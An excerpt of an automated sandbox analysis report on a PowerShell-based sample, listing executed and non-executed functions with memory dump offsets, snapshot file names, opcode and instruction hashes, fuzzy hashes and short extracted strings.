                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 344fe4d0ab51c5672ed6a0aa79d8fdc16a6bfdc60dce42102673dab51c1c52d7
                                                                • Instruction ID: c14ba0c095ccb05f48fc3aa920b77a67b4b89f8118bebdbc06215c5bd1e89d18
                                                                • Opcode Fuzzy Hash: 344fe4d0ab51c5672ed6a0aa79d8fdc16a6bfdc60dce42102673dab51c1c52d7
                                                                • Instruction Fuzzy Hash: 06A12623F0EA8A4FEBA9DA6C58645B97BD1EF56220F0801FBD09DC71D3ED18AC458341
                                                                Function 00007FFD9A17BB42 Relevance: .3, Instructions: 255COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782254130.00007FFD9A170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A170000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a170000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cd7bd09d0703b8abb95949f8b4dbb3bd4f50e52a84c70568a695d30b1b18541c
                                                                • Instruction ID: 99e0fd2e10bfeaff12ead401b06d92f20446b25bb494d2bb69fe2034cde88c76
                                                                • Opcode Fuzzy Hash: cd7bd09d0703b8abb95949f8b4dbb3bd4f50e52a84c70568a695d30b1b18541c
                                                                • Instruction Fuzzy Hash: CC917631A18A4D4FDBA8DF28C8557E937D1FF68340F14826EE85EC7295CF7499808B82
                                                                Function 00007FFD9A24A57A Relevance: .2, Instructions: 211COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8ffc9e5d78e04976216cf77f3681f871f73f6f638a5a789e70c9842de99b54b7
                                                                • Instruction ID: 63e25ea6822d19a93fb9e305a061af02fbb57eb30bf81162086f7b40631e9916
                                                                • Opcode Fuzzy Hash: 8ffc9e5d78e04976216cf77f3681f871f73f6f638a5a789e70c9842de99b54b7
                                                                • Instruction Fuzzy Hash: 1F611D62A0EBC64FEB67DB6848A45A47FF0EF17210B0901FBD499CB0E3DA19AC45C351
                                                                Function 00007FFD9A24926A Relevance: .1, Instructions: 120COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: af9f80cb8153a7f9d9591b413d8f18df6e14aaceb9da1109563591c9b23d7fbf
                                                                • Instruction ID: ad6e160142a884b5b71f355f550a7b5d11d11a1fbf9fec7e2afa51239fbfd449
                                                                • Opcode Fuzzy Hash: af9f80cb8153a7f9d9591b413d8f18df6e14aaceb9da1109563591c9b23d7fbf
                                                                • Instruction Fuzzy Hash: F141B422A4EBC64FE7AADA7848B55647FE0EF57210B0D00FBD498CB1D7D909AC49C352
                                                                Function 00007FFD9A245792 Relevance: .1, Instructions: 112COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c71f5461019723757bbebf3f3b7a37682746456724054c94da9b15d4b850e41a
                                                                • Instruction ID: 51b9f15b9f808f25d2574161c8219a6b78c1979b1e2bca4a3fcb07f6db234c82
                                                                • Opcode Fuzzy Hash: c71f5461019723757bbebf3f3b7a37682746456724054c94da9b15d4b850e41a
                                                                • Instruction Fuzzy Hash: 2E310053E1EA870FF7B99A681C311B87AC1AF57650F5812FAE0ADC70C7ED086C405242
                                                                Function 00007FFD9A244854 Relevance: .1, Instructions: 99COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8712b0ed869010899f655e8020460ef374a1c236e08cb98d05c6f95f0afec1eb
                                                                • Instruction ID: 245baeb35decc1f8e502ef807135a7c3e70445ca538b8f9d0df6a80c7dafd5bf
                                                                • Opcode Fuzzy Hash: 8712b0ed869010899f655e8020460ef374a1c236e08cb98d05c6f95f0afec1eb
                                                                • Instruction Fuzzy Hash: 4F21F223F0EAD70FF3B99AAC5C6057472C2EF86251B5811FAD02DC71D7ED19AC01A201
                                                                Function 00007FFD9A17B5C4 Relevance: .1, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782254130.00007FFD9A170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A170000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a170000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c9ee322d14f5e805eda842ff578a97ef0ff51f02c64d9d05b46aee499f62a273
                                                                • Instruction ID: 1aaa64f5d83154da6539be25d7d069f90106b0c41a64f0ba3256a2684e17457d
                                                                • Opcode Fuzzy Hash: c9ee322d14f5e805eda842ff578a97ef0ff51f02c64d9d05b46aee499f62a273
                                                                • Instruction Fuzzy Hash: 31311A32A1864E8EFBB8AF54CC6AFF93290FF51715F401179E50E871D2CB386985CA11
                                                                Function 00007FFD9A24189F Relevance: .1, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b9732b8f01af7a85922087806ac7d02fed00b098332264c38991c6b3df310c1c
                                                                • Instruction ID: 1fd4dbe64c52e2ff7bba6e8e507f0c0a2f7c99a88e60baeb87041fed4a252de0
                                                                • Opcode Fuzzy Hash: b9732b8f01af7a85922087806ac7d02fed00b098332264c38991c6b3df310c1c
                                                                • Instruction Fuzzy Hash: F521F253E0FAC70FF7B9AA78187A064BBD19F67650B0854FEC098CB0D7D80828058312
                                                                Function 00007FFD9A173945 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782254130.00007FFD9A170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A170000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a170000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                • Instruction ID: e9e06a02ed40b67f6f41c6922128af572f09d2c40a6f6892e73dd978a75ca467
                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                • Instruction Fuzzy Hash: E401677121CB0C4FD758EF0CE451AA5B7E0FB95364F10056DE58AC3695D636E881CB46
                                                                Function 00007FFD9A2490E9 Relevance: .0, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ae16163aeff0b05192f2dc3be594ceddfbecd05b993d51b7ae43a23b968385b9
                                                                • Instruction ID: 83fd054cdf093b2436e1f89f8d04b444cc2dbb80967a65821155d46934a5469d
                                                                • Opcode Fuzzy Hash: ae16163aeff0b05192f2dc3be594ceddfbecd05b993d51b7ae43a23b968385b9
                                                                • Instruction Fuzzy Hash: 9CE02633F0DA0A0EFB5D69AC2D215F8B3C2DF85120748187FD10FC288BDD1AA8124242

                                                                Non-executed Functions

                                                                Function 00007FFD9A1784F2 Relevance: 11.3, Strings: 9, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782254130.00007FFD9A170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A170000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a170000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: L_^$L_^$L_^$L_^$L_^$L_^$L_^$L_^$L_^
                                                                • API String ID: 0-3552479388
                                                                • Opcode ID: ca792d70c0482e7e5ba7420e7137170f53902c51a0a15ae357b61bf21d6fefd3
                                                                • Instruction ID: 7eedf597cbb9ae3974b0c6ef5c0b7b75f5c6bbf91ab3424ab28877b916cb4464
                                                                • Opcode Fuzzy Hash: ca792d70c0482e7e5ba7420e7137170f53902c51a0a15ae357b61bf21d6fefd3
                                                                • Instruction Fuzzy Hash: 9D2188E3F1DDC64BE36A066948BC0586F81AF71354B5E71F7D1E81B1A2AE28344B4346

                                                                Executed Functions

                                                                Function 04A4EDE0 Relevance: .3, Instructions: 281COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b911dab42d4f2471d73a876fa925a458f762b558c7309ab59e3e792eb2c2d79b
                                                                • Instruction ID: 42b5bae6f562f823165c5654798c2c2ffb6cc92123727ef092bb288fb61ea0dd
                                                                • Opcode Fuzzy Hash: b911dab42d4f2471d73a876fa925a458f762b558c7309ab59e3e792eb2c2d79b
                                                                • Instruction Fuzzy Hash: BBB14F70E00209DFDB10CFA9C9857AEBBF2BFC8314F148529E915E7294EB74A945CB91
                                                                Function 04A4FAB8 Relevance: .3, Instructions: 266COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e431b1e33632d41fe77aec26b7eb15846322ebea87fea2f30116aed840f88676
                                                                • Instruction ID: 335700ac8b0c1dc260249dfb2d280bdc738b578f71a1eef5c7b7e3af4104c8fa
                                                                • Opcode Fuzzy Hash: e431b1e33632d41fe77aec26b7eb15846322ebea87fea2f30116aed840f88676
                                                                • Instruction Fuzzy Hash: 93B16171E00209CFDF10CFA9D99179DBBF2AFC8314F149529E815EB298EB74A845CB81
                                                                Function 077F84A8 Relevance: 23.2, Strings: 18, Instructions: 698COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                • API String ID: 0-3105808640
                                                                • Opcode ID: d05ed88b60d4adfdb6ec92cdaa1083031b018ea87d17eca859bd483fb888e817
                                                                • Instruction ID: 9db4e341d4f53bfe01f4b1984351d5611258f86cb0e4e5a6eec72bcfcc1534d2
                                                                • Opcode Fuzzy Hash: d05ed88b60d4adfdb6ec92cdaa1083031b018ea87d17eca859bd483fb888e817
                                                                • Instruction Fuzzy Hash: 04323CB17042168FCB259F69DA0066BBBE2AFC6350F2484BBD605CB391DB35D845C7A3
                                                                Function 077F2C28 Relevance: 20.6, Strings: 16, Instructions: 622COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$84!l$84!l$tPkq$tPkq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                • API String ID: 0-1450378402
                                                                • Opcode ID: be5e544edf40d59f45e8f6fc9ab7644b4c99a8343e229787aa8e7ce3ade60267
                                                                • Instruction ID: 69a4e4e6fd11c2c0beab7b8e7bb398056809d0b7d927031e6e2fb0ae5437db46
                                                                • Opcode Fuzzy Hash: be5e544edf40d59f45e8f6fc9ab7644b4c99a8343e229787aa8e7ce3ade60267
                                                                • Instruction Fuzzy Hash: 46221AB17043459FCB258F28CA1066ABFF2BF86290F2488ABD645CF392DB35D845C761
                                                                Function 077F6BB8 Relevance: 15.8, Strings: 12, Instructions: 804COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq
                                                                • API String ID: 0-2513272602
                                                                • Opcode ID: 3daef1d83a0de8c2e4c83c49da2e09900afcee486a5e81e025d8cd1b6395c755
                                                                • Instruction ID: 5bbdf4e0559822ed2631d342f189c16f87bebc9cb68696f58fbbd8221ca86f83
                                                                • Opcode Fuzzy Hash: 3daef1d83a0de8c2e4c83c49da2e09900afcee486a5e81e025d8cd1b6395c755
                                                                • Instruction Fuzzy Hash: 0962A3B4A002199FCB14CF58C951B9EBBB2FF85340F1484A9DA09AF395CB35ED85CB91
                                                                Function 077F53C8 Relevance: 13.5, Strings: 10, Instructions: 971COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$4'kq$4'kq
                                                                • API String ID: 0-3682076715
                                                                • Opcode ID: 0a19e23baf922aa9f07a61e29d54e6d42173e148e7aa1d372c60b949fe5a4e70
                                                                • Instruction ID: 52bd4ff172fddb2a70003458db73d39307adf6d0bce0c5eae829b7c771b4e51b
                                                                • Opcode Fuzzy Hash: 0a19e23baf922aa9f07a61e29d54e6d42173e148e7aa1d372c60b949fe5a4e70
                                                                • Instruction Fuzzy Hash: 76927CB4B00215DFD724CB68C941F5ABBB2BB89304F14C4A9DA09AB351DB32DD85CF91
                                                                Function 077F53AB Relevance: 8.3, Strings: 6, Instructions: 779COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (f#l$(f#l$(f#l$(f#l$(f#l$4'kq
                                                                • API String ID: 0-1474314098
                                                                • Opcode ID: 357ca55fc06f111d917ce0b38e2ed386c870592e328ab75c2d61d0f9814e8961
                                                                • Instruction ID: 6970ec48a4d4e33d1a1c9ac87305d4c89e47ec2010999ae0000ce32e88b3f5ef
                                                                • Opcode Fuzzy Hash: 357ca55fc06f111d917ce0b38e2ed386c870592e328ab75c2d61d0f9814e8961
                                                                • Instruction Fuzzy Hash: FE725CB4A00215DFD724CB18C941F59BBB2BB89318F14C4E9DA09AB352DB72ED85CF91
                                                                Function 077FA5C8 Relevance: 5.6, Strings: 4, Instructions: 583COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$4'kq$4'kq$4'kq
                                                                • API String ID: 0-1293621312
                                                                • Opcode ID: 09cd46be491e441a29b896e392fbad84fbc451de47ea87e5d66cb44ccccc6d27
                                                                • Instruction ID: 79b510cf56ca5be5c1da62b0ba82093a32de0a43a7e13bcb4dfddb95f7b8bacc
                                                                • Opcode Fuzzy Hash: 09cd46be491e441a29b896e392fbad84fbc451de47ea87e5d66cb44ccccc6d27
                                                                • Instruction Fuzzy Hash: 511239F1B043559FCB118B788A0066BBFA2AFD7350F15C8BADA09CB351DA36D845C7A1
                                                                Function 077F7823 Relevance: 5.5, Strings: 4, Instructions: 458COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (f#l$4'kq$4'kq$4'kq
                                                                • API String ID: 0-3212092161
                                                                • Opcode ID: 7605c9c92e0eb163def1c72666f6ac3ae20f8790b4d6def1896c74d66cb8a0fb
                                                                • Instruction ID: 06ebf0f9393ac90e4629bd034e8b822d463facbaf382036403aa5d54b5fd9df7
                                                                • Opcode Fuzzy Hash: 7605c9c92e0eb163def1c72666f6ac3ae20f8790b4d6def1896c74d66cb8a0fb
                                                                • Instruction Fuzzy Hash: D21271B4A002199FCB18CB58C951F9DBBB2FB89340F54C4A9DA09AF355CB35EC46CB91
                                                                Function 077F7233 Relevance: 5.4, Strings: 4, Instructions: 395COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (f#l$(f#l$4'kq$4'kq
                                                                • API String ID: 0-3223654060
                                                                • Opcode ID: a5c2bd2ca446d364d9449f8fa15b98241bbcdcc803c1f39d20366eb917ba2fa6
                                                                • Instruction ID: d2e03a8ea3806175ea3917e9940c1a51894bdb5a2ad04c7395ad5d376de50e3d
                                                                • Opcode Fuzzy Hash: a5c2bd2ca446d364d9449f8fa15b98241bbcdcc803c1f39d20366eb917ba2fa6
                                                                • Instruction Fuzzy Hash: 45F1B5B4B002199FDB24DB68CD51F6EBBB3BB84300F1484A5D609AF395CB35DD858B91
                                                                Function 04A4B6F0 Relevance: 4.2, Strings: 3, Instructions: 456COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hoq$$kq$$kq
                                                                • API String ID: 0-2950107677
                                                                • Opcode ID: a71bc4285b50929e229581e9b06d75bc36d62927e108d837f9390c1ffc303093
                                                                • Instruction ID: c19f7bd37998cf413b137e1fbe5ab50fc49500f85d5966b766b675ddfcb4df8d
                                                                • Opcode Fuzzy Hash: a71bc4285b50929e229581e9b06d75bc36d62927e108d837f9390c1ffc303093
                                                                • Instruction Fuzzy Hash: 80122C34B012148FDB25EB28D9547AEB7B2AFC9315F1141E9D40AAB365DF35AE81CF80
                                                                Function 077F8DB8 Relevance: 4.0, Strings: 3, Instructions: 296COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$4'kq$$kq
                                                                • API String ID: 0-3510144023
                                                                • Opcode ID: 11f41b4397bc0231988c810c12e539ca5fbbc1b77f1ea4a3acf9a5c795dffabe
                                                                • Instruction ID: 143b46913bc9bf60db4af80fd44e304a6756661056afcd75a2ef14e098a9a824
                                                                • Opcode Fuzzy Hash: 11f41b4397bc0231988c810c12e539ca5fbbc1b77f1ea4a3acf9a5c795dffabe
                                                                • Instruction Fuzzy Hash: C7A13EB07043469FCB254B78891076A7BE2AF92240F1488BAD745CF392DB36DD45C7A2
                                                                Function 077F5FCA Relevance: 3.0, Strings: 2, Instructions: 500COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (f#l$4'kq
                                                                • API String ID: 0-2680566936
                                                                • Opcode ID: f25ffe5085b0d2249b80fa37fb9d1c2fd4743e0bc527d5867690a3a952d364d3
                                                                • Instruction ID: 0f6055c3d7c4d3956819a0ea273cd31eda459a03ae6713605a15443723458521
                                                                • Opcode Fuzzy Hash: f25ffe5085b0d2249b80fa37fb9d1c2fd4743e0bc527d5867690a3a952d364d3
                                                                • Instruction Fuzzy Hash: F8226CB4A00215DFDB24CB18C941F59BBB2BB85318F14C4E9DA09AB352DB72ED85CF91
                                                                Function 077F5020 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (f#l$(f#l
                                                                • API String ID: 0-2952237724
                                                                • Opcode ID: 2a2c92a512671d618b9a4cc05e41c858c36b4e82a5284fe69b4bfee91d45d5b6
                                                                • Instruction ID: 6fbca35dd3f800a4995d7e41540ec4b61754ffa489775e2e4334372728aee639
                                                                • Opcode Fuzzy Hash: 2a2c92a512671d618b9a4cc05e41c858c36b4e82a5284fe69b4bfee91d45d5b6
                                                                • Instruction Fuzzy Hash: CE91C6F0B00219DFC714DB68C951B5EBBE3AF89344F148465EA05AF355CB72EC858B91
                                                                Function 077F5001 Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (f#l
                                                                • API String ID: 0-4063606093
                                                                • Opcode ID: e6ea0e7e7ce0498b8a0d2aaef371551c061ba039fbffe4f14ee612bc2a350a77
                                                                • Instruction ID: f3abd282bca3d42657cf3532ca0eaa240c4e791e667e1c715e2a3d75b87d808c
                                                                • Opcode Fuzzy Hash: e6ea0e7e7ce0498b8a0d2aaef371551c061ba039fbffe4f14ee612bc2a350a77
                                                                • Instruction Fuzzy Hash: B19181F4B00205EFC714CB68C951B9ABBF2AF89344F148465EA05AF395CB72EC95CB91
                                                                Function 077F8D9D Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq
                                                                • API String ID: 0-3255046985
                                                                • Opcode ID: 7bf961cba2d1b100283bf3e3188f6095d663d0723a7c529d117f5cdb65f0622f
                                                                • Instruction ID: cc00e8e955607db7db55a6d1c2880fee7c20da91b206929293d94e0fc8037a6a
                                                                • Opcode Fuzzy Hash: 7bf961cba2d1b100283bf3e3188f6095d663d0723a7c529d117f5cdb65f0622f
                                                                • Instruction Fuzzy Hash: FF41E8F0B042069FCB248F24C750B6ABBE2AF95284F1848A5DB059B355D736DE45C7A2
                                                                Function 04A49933 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (
                                                                • API String ID: 0-3887548279
                                                                • Opcode ID: 2658eac94e2d617c3f394729e35848eaf9bd0df587005f1537a069d1d671144f
                                                                • Instruction ID: 4e718e833b109f7b944d5daa57356a159dfdaf81f6ed2932dfedfc75c5798ac2
                                                                • Opcode Fuzzy Hash: 2658eac94e2d617c3f394729e35848eaf9bd0df587005f1537a069d1d671144f
                                                                • Instruction Fuzzy Hash: EF417CB0A002049FDB24DFB5C9846AEBBF6BFC4300F148679D406AB795DB74AC46CB50
                                                                Function 04A42F50 Relevance: .5, Instructions: 510COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1f28d06f7befb6e8043396dd68048d61851dad2583ccc051a8d003d6eeb5e188
                                                                • Instruction ID: e6930d0004090d12f001e440e7bd23a2de05009943c060e9e77dfa37e1cc1944
                                                                • Opcode Fuzzy Hash: 1f28d06f7befb6e8043396dd68048d61851dad2583ccc051a8d003d6eeb5e188
                                                                • Instruction Fuzzy Hash: EC220574A012099FCB15CF99C584AAEFBB2FF88310F2585A9E815AB365C735FD41CB90
                                                                Function 04A439B0 Relevance: .3, Instructions: 330COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 548c8bd239ba581d67bc49bda15daed947301d3627b3a297454106ba3ce347be
                                                                • Instruction ID: 74bae7f150419c96a9c53df688db1e445bca079cbdd7ea2c9e40d2e46fe99e70
                                                                • Opcode Fuzzy Hash: 548c8bd239ba581d67bc49bda15daed947301d3627b3a297454106ba3ce347be
